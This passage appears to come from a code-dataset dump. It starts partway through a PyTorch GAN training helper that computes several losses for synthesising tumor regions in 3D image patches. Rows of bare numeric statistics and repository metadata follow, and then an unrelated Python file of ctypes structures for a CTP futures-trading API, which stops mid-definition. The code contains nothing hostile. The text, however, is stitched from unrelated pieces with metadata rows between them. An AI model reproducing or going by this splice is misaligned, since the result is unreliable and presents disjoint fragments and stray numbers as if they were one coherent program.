super(SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty, self).__init__(generator, discriminator,
criterions, config)
def out_put_shape(self):
self.summary_writer = SummaryWriter(self.config.tensorboard_dir)
# summary(self.generator.cpu(),
# torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)),
# torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)))
# summary(self.discriminator.cpu(),
# torch.zeros((1, 2, self.config.patch_x, self.config.patch_y, self.config.patch_z)))
# summary(self.generator.cpu(),
# torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)),
# torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)))
# summary(self.discriminator.cpu(),gatedilatericher
# torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)))
# print(self.generator)
# print(self.discriminator)
# g_out = self.generator(torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)),
# torch.zeros((1, 1, self.config.patch_x, self.config.patch_y, self.config.patch_z)))
# fake_B = g_out['outputs']
# boundary_out = g_out['so_out']
def test_one_batch(self, batch_gen):
real_A = batch_gen['real_A']
real_B = batch_gen['real_B']
boundary_B = batch_gen['boundary_B']
tumor_B = batch_gen['tumor_B']
g_out = self.generator(real_A, tumor_B)
fake_B = g_out['outputs']
boundary_out = g_out['so_out']
fake_B_coarse = g_out['coarse_outputs']
boundary_out_coarse = g_out['so_out_c']
# loss style
losses_style = 0
if 'Lsty' in self.config.helper:
loss_style = self.criterions['StyleLoss'](fake_B, real_B)
losses_style = loss_style.item()
# loss percep
losses_vgg = 0
if 'Lpercep' in self.config.helper:
loss_vgg = self.criterions['VGGLoss'](fake_B, real_B)
losses_vgg = loss_vgg.item()
# loss boundary
loss_boundary_coarse = torch.zeros(1).cuda()
losses_boundary_coarse = 0
loss_boundary = torch.zeros(1).cuda()
losses_boundary = 0
if 'Richer' in self.config.helper:
# loss coarse boundary
if boundary_out_coarse is not None:
for o in boundary_out_coarse:
loss_boundary_coarse = loss_boundary_coarse + \
self.criterions['L1LossMaskedMean'](o, real_B, boundary_B)
losses_boundary_coarse = loss_boundary_coarse.item()
# loss boundary
if boundary_out is not None:
for o in boundary_out:
loss_boundary = loss_boundary + self.criterions['L1LossMaskedMean'](o, real_B, boundary_B)
losses_boundary = loss_boundary.item()
# loss recon
losses_tumor_coarse = 0
losses_tumor = 0
if 'Lcon' in self.config.helper:
# loss coarse tumor
if fake_B_coarse is not None:
loss_tumor_coarse = self.criterions['L1LossMaskedMean'](fake_B_coarse, real_B, tumor_B)
losses_tumor_coarse = loss_tumor_coarse.item()
# loss tumor
if fake_B is not None:
loss_tumor = self.criterions['L1LossMaskedMean'](fake_B, real_B, tumor_B)
losses_tumor = loss_tumor.item()
# # Pixel-wise loss
losses_pixel = 0
if real_B is not None:
loss_pixel = self.criterions['criterion_pixelwise'](fake_B, real_B)
losses_pixel = loss_pixel.item()
losses_pixel_coarse = 0
if fake_B_coarse is not None:
loss_pixel_coarse = self.criterions['criterion_pixelwise'](fake_B_coarse, real_B)
losses_pixel_coarse = loss_pixel_coarse.item()
return {
"loss_pixel": losses_pixel,
"loss_pixel_coarse": losses_pixel_coarse,
"loss_boundary": losses_boundary,
"loss_boundary_coarse": losses_boundary_coarse,
"loss_tumor": losses_tumor,
"loss_tumor_coarse": losses_tumor_coarse,
"fake_B": fake_B,
"fake_B_coarse": fake_B_coarse,
"boundary": boundary_out,
"boundary_coarse": boundary_out_coarse,
"loss_percep": losses_vgg,
"loss_style": losses_style
}
def train_generator_one_batch_pretrained(self, batch_gen):
real_A = batch_gen['real_A']
real_B = batch_gen['real_B']
boundary_B = batch_gen['boundary_B']
tumor_B = batch_gen['tumor_B']
# generator output, inpuy and mask
g_out = self.generator(real_A, tumor_B, pre_trained=True)
fake_B = g_out['outputs']
boundary_out = g_out['so_out']
self.set_requires_grad(self.discriminator, False)
# loss gan
pred_fake = self.discriminator(torch.cat((fake_B.detach(), tumor_B), 1))
out_shape = (pred_fake.size(0), 1, pred_fake.size(2), pred_fake.size(3), pred_fake.size(4))
valid_label = self.FloatTensor(np.ones(out_shape))
loss_fake = self.criterions['criterion_GAN'](pred_fake, valid_label)
loss_GAN_final = loss_fake
losses_GAN = loss_GAN_final.item()
# loss style
loss_style = torch.zeros(1).cuda()
losses_style = 0
if 'Lsty' in self.config.helper:
loss_style = self.criterions['StyleLoss'](fake_B, real_B)
losses_style = loss_style.item()
# loss percep
loss_vgg = torch.zeros(1).cuda()
losses_vgg = 0
if 'Lpercep' in self.config.helper:
loss_vgg = self.criterions['VGGLoss'](fake_B, real_B)
losses_vgg = loss_vgg.item()
# loss boundary
loss_boundary_coarse = torch.zeros(1).cuda()
losses_boundary_coarse = 0
loss_boundary = torch.zeros(1).cuda()
losses_boundary = 0
if 'Richer' in self.config.helper:
# loss boundary
if boundary_out is not None:
for o in boundary_out:
loss_boundary = loss_boundary + self.criterions['L1LossMaskedMean'](o, real_B, boundary_B)
losses_boundary = loss_boundary.item()
# loss recon
loss_tumor_coarse = torch.zeros(1).cuda()
losses_tumor_coarse = 0
loss_tumor = torch.zeros(1).cuda()
losses_tumor = 0
if 'Lcon' in self.config.helper:
# loss tumor
if fake_B is not None:
loss_tumor = self.criterions['L1LossMaskedMean'](fake_B, real_B, tumor_B)
losses_tumor = loss_tumor.item()
# # Pixel-wise loss
loss_pixel = torch.zeros(1).cuda()
losses_pixel = 0
if real_B is not None:
loss_pixel = self.criterions['criterion_pixelwise'](fake_B, real_B)
losses_pixel = loss_pixel.item()
loss_pixel_coarse = torch.zeros(1).cuda()
losses_pixel_coarse = 0
# Total loss
loss_G = loss_GAN_final + self.config.lambda_fix * (
self.config.percep_loss_factor * loss_vgg +
self.config.style_loss_factor * loss_style +
self.config.lambda_pixel * (
loss_pixel + loss_pixel_coarse) +
self.config.tumor_loss_factor * (
loss_tumor + loss_tumor_coarse) +
self.config.boundary_loss_factor * (
loss_boundary + loss_boundary_coarse))
# loss_G = loss_GAN + lambda_pixel * loss_pixel
losses_G = loss_G.item()
loss_G.backward()
return {
"loss_GAN": losses_GAN,
"loss_pixel": losses_pixel,
"loss_pixel_coarse": losses_pixel_coarse,
"loss_boundary": losses_boundary,
"loss_boundary_coarse": losses_boundary_coarse,
"loss_tumor": losses_tumor,
"loss_tumor_coarse": losses_tumor_coarse,
"loss_G": losses_G,
"fake_B": fake_B,
"loss_percep": losses_vgg,
"loss_style": losses_style
}
def train_generator_one_batch(self, batch_gen):
real_A = batch_gen['real_A']
real_B = batch_gen['real_B']
boundary_B = batch_gen['boundary_B']
tumor_B = batch_gen['tumor_B']
# generator output, inpuy and mask
g_out = self.generator(real_A, tumor_B)
fake_B = g_out['outputs']
boundary_out = g_out['so_out']
fake_B_coarse = g_out['coarse_outputs']
boundary_out_coarse = g_out['so_out_c']
self.set_requires_grad(self.discriminator, False)
# loss gan
pred_fake = self.discriminator(torch.cat((fake_B.detach(), tumor_B), 1))
out_shape = (pred_fake.size(0), 1, pred_fake.size(2), pred_fake.size(3), pred_fake.size(4))
valid_label = self.FloatTensor(np.ones(out_shape))
loss_fake = self.criterions['criterion_GAN'](pred_fake, valid_label)
loss_GAN_final = loss_fake
losses_GAN = loss_GAN_final.item()
# loss style
loss_style = torch.zeros(1).cuda()
losses_style = 0
if 'Lsty' in self.config.helper:
loss_style = self.criterions['StyleLoss'](fake_B, real_B)
losses_style = loss_style.item()
# loss percep
loss_vgg = torch.zeros(1).cuda()
losses_vgg = 0
if 'Lpercep' in self.config.helper:
loss_vgg = self.criterions['VGGLoss'](fake_B, real_B)
losses_vgg = loss_vgg.item()
# loss boundary
loss_boundary_coarse = torch.zeros(1).cuda()
losses_boundary_coarse = 0
loss_boundary = torch.zeros(1).cuda()
losses_boundary = 0
if 'Richer' in self.config.helper:
# loss coarse boundary
if boundary_out_coarse is not None:
for o in boundary_out_coarse:
loss_boundary_coarse = loss_boundary_coarse + \
self.criterions['L1LossMaskedMean'](o, real_B, boundary_B)
losses_boundary_coarse = loss_boundary_coarse.item()
# loss boundary
if boundary_out is not None:
for o in boundary_out:
loss_boundary = loss_boundary + self.criterions['L1LossMaskedMean'](o, real_B, boundary_B)
losses_boundary = loss_boundary.item()
# loss recon
loss_tumor_coarse = torch.zeros(1).cuda()
losses_tumor_coarse = 0
loss_tumor = torch.zeros(1).cuda()
losses_tumor = 0
if 'Lcon' in self.config.helper:
# loss coarse tumor
if fake_B_coarse is not None:
loss_tumor_coarse = self.criterions['L1LossMaskedMean'](fake_B_coarse, real_B, tumor_B)
losses_tumor_coarse = loss_tumor_coarse.item()
# loss tumor
if fake_B is not None:
loss_tumor = self.criterions['L1LossMaskedMean'](fake_B, real_B, tumor_B)
losses_tumor = loss_tumor.item()
# # Pixel-wise loss
loss_pixel = torch.zeros(1).cuda()
losses_pixel = 0
if real_B is not None:
loss_pixel = self.criterions['criterion_pixelwise'](fake_B, real_B)
losses_pixel = loss_pixel.item()
loss_pixel_coarse = torch.zeros(1).cuda()
losses_pixel_coarse = 0
if fake_B_coarse is not None:
loss_pixel_coarse = self.criterions['criterion_pixelwise'](fake_B_coarse, real_B)
losses_pixel_coarse = loss_pixel_coarse.item()
# Total loss
loss_G = loss_GAN_final + self.config.lambda_fix * (
self.config.percep_loss_factor * loss_vgg +
self.config.style_loss_factor * loss_style +
self.config.lambda_pixel * (
loss_pixel + loss_pixel_coarse) +
self.config.tumor_loss_factor * (
loss_tumor + loss_tumor_coarse) +
self.config.boundary_loss_factor * (
loss_boundary + loss_boundary_coarse))
# loss_G = loss_GAN + lambda_pixel * loss_pixel
losses_G = loss_G.item()
loss_G.backward()
return {
"loss_GAN": losses_GAN,
"loss_pixel": losses_pixel,
"loss_pixel_coarse": losses_pixel_coarse,
"loss_boundary": losses_boundary,
"loss_boundary_coarse": losses_boundary_coarse,
"loss_tumor": losses_tumor,
"loss_tumor_coarse": losses_tumor_coarse,
"loss_G": losses_G,
"fake_B": fake_B,
"loss_percep": losses_vgg,
"loss_style": losses_style
}
| 42.394322
| 116
| 0.59997
| 1,659
| 13,439
| 4.515371
| 0.069922
| 0.065412
| 0.038179
| 0.036043
| 0.923909
| 0.923909
| 0.923909
| 0.913229
| 0.913229
| 0.913229
| 0
| 0.008575
| 0.305826
| 13,439
| 316
| 117
| 42.528481
| 0.794405
| 0.11608
| 0
| 0.909871
| 0
| 0
| 0.081854
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021459
| false
| 0
| 0.017167
| 0
| 0.055794
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5174933140d42078b4f9d436b244d3c0b4964e07
| 552,668
|
py
|
Python
|
rqctp/structs.py
|
ricequant/rqctp
|
49bca74b51d37d6aa334b902f7e1d1124a577243
|
[
"Apache-2.0"
] | 4
|
2019-11-10T06:14:42.000Z
|
2022-02-15T01:11:40.000Z
|
rqctp/structs.py
|
ricequant/rqctp
|
49bca74b51d37d6aa334b902f7e1d1124a577243
|
[
"Apache-2.0"
] | 1
|
2019-12-13T01:09:12.000Z
|
2021-02-05T03:04:23.000Z
|
rqctp/structs.py
|
ricequant/rqctp
|
49bca74b51d37d6aa334b902f7e1d1124a577243
|
[
"Apache-2.0"
] | 2
|
2019-11-10T06:14:56.000Z
|
2020-04-27T16:56:20.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Ricequant, Inc
#
# * Commercial Usage: please contact public@ricequant.com
# * Non-Commercial Usage:
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_int, c_short, c_char, c_double
from .utils import Struct
c_char_Array_2 = c_char * 2
c_char_Array_3 = c_char * 3
c_char_Array_4 = c_char * 4
c_char_Array_5 = c_char * 5
c_char_Array_6 = c_char * 6
c_char_Array_7 = c_char * 7
c_char_Array_9 = c_char * 9
c_char_Array_10 = c_char * 10
c_char_Array_11 = c_char * 11
c_char_Array_12 = c_char * 12
c_char_Array_13 = c_char * 13
c_char_Array_15 = c_char * 15
c_char_Array_16 = c_char * 16
c_char_Array_17 = c_char * 17
c_char_Array_20 = c_char * 20
c_char_Array_21 = c_char * 21
c_char_Array_22 = c_char * 22
c_char_Array_23 = c_char * 23
c_char_Array_24 = c_char * 24
c_char_Array_25 = c_char * 25
c_char_Array_31 = c_char * 31
c_char_Array_33 = c_char * 33
c_char_Array_36 = c_char * 36
c_char_Array_41 = c_char * 41
c_char_Array_51 = c_char * 51
c_char_Array_61 = c_char * 61
c_char_Array_65 = c_char * 65
c_char_Array_71 = c_char * 71
c_char_Array_81 = c_char * 81
c_char_Array_100 = c_char * 100
c_char_Array_101 = c_char * 101
c_char_Array_129 = c_char * 129
c_char_Array_161 = c_char * 161
c_char_Array_201 = c_char * 201
c_char_Array_256 = c_char * 256
c_char_Array_257 = c_char * 257
c_char_Array_261 = c_char * 261
c_char_Array_273 = c_char * 273
c_char_Array_301 = c_char * 301
c_char_Array_349 = c_char * 349
c_char_Array_365 = c_char * 365
c_char_Array_401 = c_char * 401
c_char_Array_501 = c_char * 501
c_char_Array_513 = c_char * 513
c_char_Array_1001 = c_char * 1001
c_char_Array_1025 = c_char * 1025
c_char_Array_2049 = c_char * 2049
c_char_Array_2561 = c_char * 2561
class Dissemination(Struct):
_fields_ = [
("SequenceSeries", c_short),
("SequenceNo", c_int),
]
def __init__(self, SequenceSeries=None, SequenceNo=None):
super().__init__()
if SequenceSeries:
self.SequenceSeries = SequenceSeries
if SequenceNo:
self.SequenceNo = SequenceNo
class ReqUserLogin(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("Password", c_char_Array_41),
("UserProductInfo", c_char_Array_11),
("InterfaceProductInfo", c_char_Array_11),
("ProtocolInfo", c_char_Array_11),
("MacAddress", c_char_Array_21),
("OneTimePassword", c_char_Array_41),
("ClientIPAddress", c_char_Array_16),
("LoginRemark", c_char_Array_36),
("ClientIPPort", c_int),
]
def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, OneTimePassword=None, ClientIPAddress=None, LoginRemark=None, ClientIPPort=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if InterfaceProductInfo:
self.InterfaceProductInfo = InterfaceProductInfo.encode("GBK")
if ProtocolInfo:
self.ProtocolInfo = ProtocolInfo.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if OneTimePassword:
self.OneTimePassword = OneTimePassword.encode("GBK")
if ClientIPAddress:
self.ClientIPAddress = ClientIPAddress.encode("GBK")
if LoginRemark:
self.LoginRemark = LoginRemark.encode("GBK")
if ClientIPPort:
self.ClientIPPort = ClientIPPort
class RspUserLogin(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("LoginTime", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("SystemName", c_char_Array_41),
("FrontID", c_int),
("SessionID", c_int),
("MaxOrderRef", c_char_Array_13),
("SHFETime", c_char_Array_9),
("DCETime", c_char_Array_9),
("CZCETime", c_char_Array_9),
("FFEXTime", c_char_Array_9),
("INETime", c_char_Array_9),
]
def __init__(self, TradingDay=None, LoginTime=None, BrokerID=None, UserID=None, SystemName=None, FrontID=None, SessionID=None, MaxOrderRef=None, SHFETime=None, DCETime=None, CZCETime=None, FFEXTime=None, INETime=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if LoginTime:
self.LoginTime = LoginTime.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if SystemName:
self.SystemName = SystemName.encode("GBK")
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if MaxOrderRef:
self.MaxOrderRef = MaxOrderRef.encode("GBK")
if SHFETime:
self.SHFETime = SHFETime.encode("GBK")
if DCETime:
self.DCETime = DCETime.encode("GBK")
if CZCETime:
self.CZCETime = CZCETime.encode("GBK")
if FFEXTime:
self.FFEXTime = FFEXTime.encode("GBK")
if INETime:
self.INETime = INETime.encode("GBK")
class UserLogout(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class ForceUserLogout(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class ReqAuthenticate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserProductInfo", c_char_Array_11),
("AuthCode", c_char_Array_17),
("AppID", c_char_Array_33),
]
def __init__(self, BrokerID=None, UserID=None, UserProductInfo=None, AuthCode=None, AppID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if AuthCode:
self.AuthCode = AuthCode.encode("GBK")
if AppID:
self.AppID = AppID.encode("GBK")
class RspAuthenticate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserProductInfo", c_char_Array_11),
("AppID", c_char_Array_33),
("AppType", c_char),
]
def __init__(self, BrokerID=None, UserID=None, UserProductInfo=None, AppID=None, AppType=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if AppID:
self.AppID = AppID.encode("GBK")
if AppType:
self.AppType = AppType.encode("GBK")
class AuthenticationInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserProductInfo", c_char_Array_11),
("AuthInfo", c_char_Array_129),
("IsResult", c_int),
("AppID", c_char_Array_33),
("AppType", c_char),
]
def __init__(self, BrokerID=None, UserID=None, UserProductInfo=None, AuthInfo=None, IsResult=None, AppID=None, AppType=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if AuthInfo:
self.AuthInfo = AuthInfo.encode("GBK")
if IsResult:
self.IsResult = IsResult
if AppID:
self.AppID = AppID.encode("GBK")
if AppType:
self.AppType = AppType.encode("GBK")
class RspUserLogin2(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("LoginTime", c_char_Array_9),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("SystemName", c_char_Array_41),
("FrontID", c_int),
("SessionID", c_int),
("MaxOrderRef", c_char_Array_13),
("SHFETime", c_char_Array_9),
("DCETime", c_char_Array_9),
("CZCETime", c_char_Array_9),
("FFEXTime", c_char_Array_9),
("INETime", c_char_Array_9),
("RandomString", c_char_Array_17),
]
def __init__(self, TradingDay=None, LoginTime=None, BrokerID=None, UserID=None, SystemName=None, FrontID=None, SessionID=None, MaxOrderRef=None, SHFETime=None, DCETime=None, CZCETime=None, FFEXTime=None, INETime=None, RandomString=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if LoginTime:
self.LoginTime = LoginTime.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if SystemName:
self.SystemName = SystemName.encode("GBK")
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if MaxOrderRef:
self.MaxOrderRef = MaxOrderRef.encode("GBK")
if SHFETime:
self.SHFETime = SHFETime.encode("GBK")
if DCETime:
self.DCETime = DCETime.encode("GBK")
if CZCETime:
self.CZCETime = CZCETime.encode("GBK")
if FFEXTime:
self.FFEXTime = FFEXTime.encode("GBK")
if INETime:
self.INETime = INETime.encode("GBK")
if RandomString:
self.RandomString = RandomString.encode("GBK")
class TransferHeader(Struct):
_fields_ = [
("Version", c_char_Array_4),
("TradeCode", c_char_Array_7),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("TradeSerial", c_char_Array_9),
("FutureID", c_char_Array_11),
("BankID", c_char_Array_4),
("BankBrchID", c_char_Array_5),
("OperNo", c_char_Array_17),
("DeviceID", c_char_Array_3),
("RecordNum", c_char_Array_7),
("SessionID", c_int),
("RequestID", c_int),
]
def __init__(self, Version=None, TradeCode=None, TradeDate=None, TradeTime=None, TradeSerial=None, FutureID=None, BankID=None, BankBrchID=None, OperNo=None, DeviceID=None, RecordNum=None, SessionID=None, RequestID=None):
super().__init__()
if Version:
self.Version = Version.encode("GBK")
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if TradeSerial:
self.TradeSerial = TradeSerial.encode("GBK")
if FutureID:
self.FutureID = FutureID.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBrchID:
self.BankBrchID = BankBrchID.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if RecordNum:
self.RecordNum = RecordNum.encode("GBK")
if SessionID:
self.SessionID = SessionID
if RequestID:
self.RequestID = RequestID
class TransferBankToFutureReq(Struct):
_fields_ = [
("FutureAccount", c_char_Array_13),
("FuturePwdFlag", c_char),
("FutureAccPwd", c_char_Array_17),
("TradeAmt", c_double),
("CustFee", c_double),
("CurrencyCode", c_char_Array_4),
]
def __init__(self, FutureAccount=None, FuturePwdFlag=None, FutureAccPwd=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
super().__init__()
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if FuturePwdFlag:
self.FuturePwdFlag = FuturePwdFlag.encode("GBK")
if FutureAccPwd:
self.FutureAccPwd = FutureAccPwd.encode("GBK")
if TradeAmt:
self.TradeAmt = TradeAmt
if CustFee:
self.CustFee = CustFee
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
class TransferBankToFutureRsp(Struct):
_fields_ = [
("RetCode", c_char_Array_5),
("RetInfo", c_char_Array_129),
("FutureAccount", c_char_Array_13),
("TradeAmt", c_double),
("CustFee", c_double),
("CurrencyCode", c_char_Array_4),
]
def __init__(self, RetCode=None, RetInfo=None, FutureAccount=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
super().__init__()
if RetCode:
self.RetCode = RetCode.encode("GBK")
if RetInfo:
self.RetInfo = RetInfo.encode("GBK")
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if TradeAmt:
self.TradeAmt = TradeAmt
if CustFee:
self.CustFee = CustFee
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
class TransferFutureToBankReq(Struct):
_fields_ = [
("FutureAccount", c_char_Array_13),
("FuturePwdFlag", c_char),
("FutureAccPwd", c_char_Array_17),
("TradeAmt", c_double),
("CustFee", c_double),
("CurrencyCode", c_char_Array_4),
]
def __init__(self, FutureAccount=None, FuturePwdFlag=None, FutureAccPwd=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
super().__init__()
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if FuturePwdFlag:
self.FuturePwdFlag = FuturePwdFlag.encode("GBK")
if FutureAccPwd:
self.FutureAccPwd = FutureAccPwd.encode("GBK")
if TradeAmt:
self.TradeAmt = TradeAmt
if CustFee:
self.CustFee = CustFee
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
class TransferFutureToBankRsp(Struct):
_fields_ = [
("RetCode", c_char_Array_5),
("RetInfo", c_char_Array_129),
("FutureAccount", c_char_Array_13),
("TradeAmt", c_double),
("CustFee", c_double),
("CurrencyCode", c_char_Array_4),
]
def __init__(self, RetCode=None, RetInfo=None, FutureAccount=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
super().__init__()
if RetCode:
self.RetCode = RetCode.encode("GBK")
if RetInfo:
self.RetInfo = RetInfo.encode("GBK")
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if TradeAmt:
self.TradeAmt = TradeAmt
if CustFee:
self.CustFee = CustFee
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
class TransferQryBankReq(Struct):
_fields_ = [
("FutureAccount", c_char_Array_13),
("FuturePwdFlag", c_char),
("FutureAccPwd", c_char_Array_17),
("CurrencyCode", c_char_Array_4),
]
def __init__(self, FutureAccount=None, FuturePwdFlag=None, FutureAccPwd=None, CurrencyCode=None):
super().__init__()
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if FuturePwdFlag:
self.FuturePwdFlag = FuturePwdFlag.encode("GBK")
if FutureAccPwd:
self.FutureAccPwd = FutureAccPwd.encode("GBK")
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
class TransferQryBankRsp(Struct):
_fields_ = [
("RetCode", c_char_Array_5),
("RetInfo", c_char_Array_129),
("FutureAccount", c_char_Array_13),
("TradeAmt", c_double),
("UseAmt", c_double),
("FetchAmt", c_double),
("CurrencyCode", c_char_Array_4),
]
def __init__(self, RetCode=None, RetInfo=None, FutureAccount=None, TradeAmt=None, UseAmt=None, FetchAmt=None, CurrencyCode=None):
super().__init__()
if RetCode:
self.RetCode = RetCode.encode("GBK")
if RetInfo:
self.RetInfo = RetInfo.encode("GBK")
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if TradeAmt:
self.TradeAmt = TradeAmt
if UseAmt:
self.UseAmt = UseAmt
if FetchAmt:
self.FetchAmt = FetchAmt
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
class TransferQryDetailReq(Struct):
_fields_ = [
("FutureAccount", c_char_Array_13),
]
def __init__(self, FutureAccount=None):
super().__init__()
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
class TransferQryDetailRsp(Struct):
_fields_ = [
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("TradeCode", c_char_Array_7),
("FutureSerial", c_int),
("FutureID", c_char_Array_11),
("FutureAccount", c_char_Array_22),
("BankSerial", c_int),
("BankID", c_char_Array_4),
("BankBrchID", c_char_Array_5),
("BankAccount", c_char_Array_41),
("CertCode", c_char_Array_21),
("CurrencyCode", c_char_Array_4),
("TxAmount", c_double),
("Flag", c_char),
]
def __init__(self, TradeDate=None, TradeTime=None, TradeCode=None, FutureSerial=None, FutureID=None, FutureAccount=None, BankSerial=None, BankID=None, BankBrchID=None, BankAccount=None, CertCode=None, CurrencyCode=None, TxAmount=None, Flag=None):
super().__init__()
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if FutureSerial:
self.FutureSerial = FutureSerial
if FutureID:
self.FutureID = FutureID.encode("GBK")
if FutureAccount:
self.FutureAccount = FutureAccount.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial
if BankID:
self.BankID = BankID.encode("GBK")
if BankBrchID:
self.BankBrchID = BankBrchID.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if CertCode:
self.CertCode = CertCode.encode("GBK")
if CurrencyCode:
self.CurrencyCode = CurrencyCode.encode("GBK")
if TxAmount:
self.TxAmount = TxAmount
if Flag:
self.Flag = Flag.encode("GBK")
class RspInfo(Struct):
_fields_ = [
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, ErrorID=None, ErrorMsg=None):
super().__init__()
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class Exchange(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ExchangeName", c_char_Array_61),
("ExchangeProperty", c_char),
]
def __init__(self, ExchangeID=None, ExchangeName=None, ExchangeProperty=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExchangeName:
self.ExchangeName = ExchangeName.encode("GBK")
if ExchangeProperty:
self.ExchangeProperty = ExchangeProperty.encode("GBK")
class Product(Struct):
_fields_ = [
("ProductID", c_char_Array_31),
("ProductName", c_char_Array_21),
("ExchangeID", c_char_Array_9),
("ProductClass", c_char),
("VolumeMultiple", c_int),
("PriceTick", c_double),
("MaxMarketOrderVolume", c_int),
("MinMarketOrderVolume", c_int),
("MaxLimitOrderVolume", c_int),
("MinLimitOrderVolume", c_int),
("PositionType", c_char),
("PositionDateType", c_char),
("CloseDealType", c_char),
("TradeCurrencyID", c_char_Array_4),
